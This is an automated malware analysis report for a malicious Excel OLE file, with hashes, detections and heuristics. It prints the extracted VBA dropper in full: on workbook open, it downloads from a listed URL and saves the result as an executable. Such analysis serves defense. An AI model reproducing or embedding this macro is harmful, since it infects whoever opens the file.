Office (OLE) malware analysis — malicious · 9a1cde5e4e066932

MALICIOUS

Office (OLE)

147.5 KB Created: 2019-05-18 07:27:21 Authoring application: Microsoft Excel First seen: 2021-04-10

MD5: 98dd2b2ab44502731941bfb3b33316f0 SHA-1: ceb68a619dd39cca9537cfe4d426dd36cf20b698 SHA-256: 9a1cde5e4e066932debff522b48144ddcf9507955b618cd99815853a230a0ebe

270 Risk Score

Heuristics 8

ClamAV: Doc.Dropper.Agent-6995334-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6995334-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC

VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
Matched line in script
```
    .write UserForm8.Stack1.responseBody
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set UserForm8.ProAsO1 = CreateObject(UserForm8.Label2.Caption)
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Sub WorkBook_open()
```
Suspicious cmd.exe invocation with execution flag high SC_STR_CMD

Suspicious cmd.exe invocation with execution flag
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://bascif.com/tt1 Referenced by macro
- http://t2.symcb.com0Referenced by macro
- http://tl.symcd.com0&Referenced by macro
- http://ns.adobe.com/xap/1.0/Referenced by macro
- http://www.w3.org/1999/02/22-rdf-syntax-ns#Referenced by macro
- http://ns.adobe.com/photoshop/1.0/Referenced by macro
- http://purl.org/dc/elements/1.1/Referenced by macro
- http://ns.adobe.com/xap/1.0/mm/Referenced by macro
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#Referenced by macro
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#Referenced by macro
- http://t1.symcb.com/ThawtePCA.crl0Referenced by macro
- http://tl.symcb.com/tl.crl0Referenced by macro
- https://www.thawte.com/cps0/Referenced by macro
- https://www.thawte.com/repository0WReferenced by macro
- http://tl.symcb.com/tl.crt0Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

Filename	Kind	Source	Size
`macros.bas`🔏 SignedVBA project digital signature Covers VBA source only — not the compiled p-code. A digital signature does not by itself mean the macro is safe.	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2991 bytes
SHA-256: `83171ad241b6229bd9b9c3c6f4b2e5b9af00520ff6b3b3e5e7025433b423243e`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Sub WorkBook_open() UserForm7.Show End Sub Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Public Sub Anykey() Dim time time = Format(Now + TimeSerial(0, 1, 1), "hh:mm") ExecuteExcel4Macro "MESSAGE(True, ""release"")" #If Juliet Then Dim varSet5 Dim varSet6 Dim varSet7 Dim varSet9 Dim varSet8 Dim varSet11 Dim varSet12 #End If End Sub Attribute VB_Name = "UserForm8" Attribute VB_Base = "0{4E02938E-31ED-4B39-9CF2-7B2D3926817E}{1AB7E616-12BE-48D9-AF15-467C948DFF4D}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Public ProAsO1 As Object Public Stack1 As Object Public ProAsO2 As Object Public Stack2 As Object Public ProAsO3 As Object Public Stack3 As Object Public Sub Label5_Click() Dim varSet5 Stack1.Open Me.Label3.Caption, Me.TextBox3.Tag, False Dim varSet6 End Sub Public Sub S1000() End Sub Public Sub frfr4() End Sub Private Sub UserForm_Click() End Sub Attribute VB_Name = "Class1" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Public Sub stvb113() Sheet1.Anykey Set UserForm8.ProAsO1 = CreateObject(UserForm8.Label2.Caption) Dim varSet4 Set UserForm8.Stack1 = CreateObject(UserForm8.Label1.Caption) Dim varSet3 UserForm8.Label5_Click UserForm8.Stack1.Send With UserForm8.ProAsO1 .Type = 1 End With UserForm8.ProAsO1.Open With UserForm8.ProAsO1 .write UserForm8.Stack1.responseBody End With #If Romeo Then UserForm8.ProAsO1.savetofile "all.e" & "xe", 2 #End If End Sub Attribute VB_Name = "UserForm7" Attribute VB_Base = "0{D08B52F0-0485-4D2A-B95C-1D2B5DA1C733}{A550A1B3-7AE1-42F4-944B-573CACD6D0DE}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub UserForm_Activate() Dim c As New Class1 c.stvb113 ExecuteExcel4Macro UserForm8.TextBox3.Text ExecuteExcel4Macro "MESSAGE(True, ""9999"")" Unload Me End Sub

macros.bas🔏 Signed

vba-macro

oletools.olevba.extract_macros (decoded VBA source)

2991 bytes

SHA-256: 83171ad241b6229bd9b9c3c6f4b2e5b9af00520ff6b3b3e5e7025433b423243e

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub WorkBook_open()
UserForm7.Show



End Sub



Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Public Sub Anykey()
Dim time
time = Format(Now + TimeSerial(0, 1, 1), "hh:mm")

ExecuteExcel4Macro "MESSAGE(True, ""release"")"
#If Juliet Then

Dim varSet5
Dim varSet6
Dim varSet7
Dim varSet9
Dim varSet8
Dim varSet11
Dim varSet12


#End If
End Sub



Attribute VB_Name = "UserForm8"
Attribute VB_Base = "0{4E02938E-31ED-4B39-9CF2-7B2D3926817E}{1AB7E616-12BE-48D9-AF15-467C948DFF4D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
 Public ProAsO1 As Object
Public Stack1 As Object
 Public ProAsO2 As Object
Public Stack2 As Object
 Public ProAsO3 As Object
Public Stack3 As Object



Public Sub Label5_Click()
Dim varSet5
Stack1.Open Me.Label3.Caption, Me.TextBox3.Tag, False
Dim varSet6
End Sub

Public Sub S1000()

End Sub
Public Sub frfr4()

End Sub

Private Sub UserForm_Click()

End Sub

Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Public Sub stvb113()

Sheet1.Anykey


Set UserForm8.ProAsO1 = CreateObject(UserForm8.Label2.Caption)
Dim varSet4

Set UserForm8.Stack1 = CreateObject(UserForm8.Label1.Caption)
Dim varSet3
UserForm8.Label5_Click
UserForm8.Stack1.Send

With UserForm8.ProAsO1
    .Type = 1
End With
    UserForm8.ProAsO1.Open
With UserForm8.ProAsO1
    .write UserForm8.Stack1.responseBody

End With
#If Romeo Then
    UserForm8.ProAsO1.savetofile "all.e" & "xe", 2

#End If

End Sub

Attribute VB_Name = "UserForm7"
Attribute VB_Base = "0{D08B52F0-0485-4D2A-B95C-1D2B5DA1C733}{A550A1B3-7AE1-42F4-944B-573CACD6D0DE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Activate()

    Dim c As New Class1
c.stvb113

    ExecuteExcel4Macro UserForm8.TextBox3.Text
ExecuteExcel4Macro "MESSAGE(True, ""9999"")"
Unload Me
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.